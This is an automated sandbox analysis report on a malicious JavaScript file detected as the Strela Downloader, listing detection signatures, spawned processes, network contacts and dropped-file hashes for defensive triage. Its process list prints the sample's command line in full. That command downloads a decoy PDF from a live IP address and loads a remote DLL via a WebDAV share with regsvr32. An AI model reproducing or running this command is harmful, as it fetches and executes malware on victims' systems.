Windows
Analysis Report
21646213161445014123.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 1548 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\21646 2131614450 14123.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 432 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\299 8255622333 5.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5000 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 5552 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5588 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7212 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1668,i ,956606252 2903911710 ,105109034 3668290694 1,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 2324 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587780 |
Start date and time: | 2025-01-10 17:56:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 21646213161445014123.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 52.6.155.20, 52.22.41.97, 3.219.243.226, 3.233.129.217, 172.64.41.3, 162.159.61.3, 2.23.242.162, 2.16.168.105, 2.16.168.107, 23.209.209.135, 23.204.152.213, 23.204.152.210, 192.168.2.6, 13.107.246.45, 52.149.20.212, 96.17.64.171
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 21646213161445014123.js
Time | Type | Description |
---|---|---|
11:57:06 | API Interceptor | |
11:57:10 | API Interceptor | |
11:57:11 | API Interceptor | |
11:57:23 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263167745870244 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0r:9JZj5MiKNnNhoxuC |
MD5: | CAE6F2A9BAB60117C4210925FAEF98AE |
SHA1: | F63F922B0E0DDD5D33F8D881F0A47819E280BB68 |
SHA-256: | F35025C09BB01A90E246D6AD69CB988AF9DCDA9C74E79DE6B775747841898E83 |
SHA-512: | 05414B3246C72AC4EB1782E56AA1713F0E1C1A1AAF95E36FD80F22ED05F20E5FC590F6978591A29C2C55A260B948DFE4CC95ED5F963A4000441FAD5DB58B07B6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555376797371797 |
Encrypted: | false |
SSDEEP: | 1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL |
MD5: | F37D685D24183A05442F53A3154AAAFC |
SHA1: | 4B8A21E4747FF7A91841839706749E7432FF9A11 |
SHA-256: | FA3167B5EFF3EB90CE20E5F090767A41886FB6C1C19BCB4312906EF1A1186B09 |
SHA-512: | 18BA6749A0CB8A0A9157C731B97D5CCC860A23C26805BBAFE00A34836C017FAB2DDC419A476DA9D30E3EE151C7D3178A049BC77662A7114D55690524ED8E21B8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07821723066455513 |
Encrypted: | false |
SSDEEP: | 3:htmll8YeeEvw0efNaAPaU1lnLy18B/talluxmO+l/SNxOf:htW8zBHENDPaUDcgmOH |
MD5: | 055D71DF6CF51053003375B6F16E43EC |
SHA1: | 68AEFB077269DE8FED7B910AF059053D4D229817 |
SHA-256: | 881728A608D8FCA5BDF5DD1F1B1A39020FAE37DE95E531206B6906BAD865781B |
SHA-512: | C0191A1382DD921275D768073392C69D92679731A8E679DDC625B3B84009B714525E5B08E48FAAB0EBEE82746EA2D710CE20871D02F5EED3FB3F6B0E9D20C0BA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
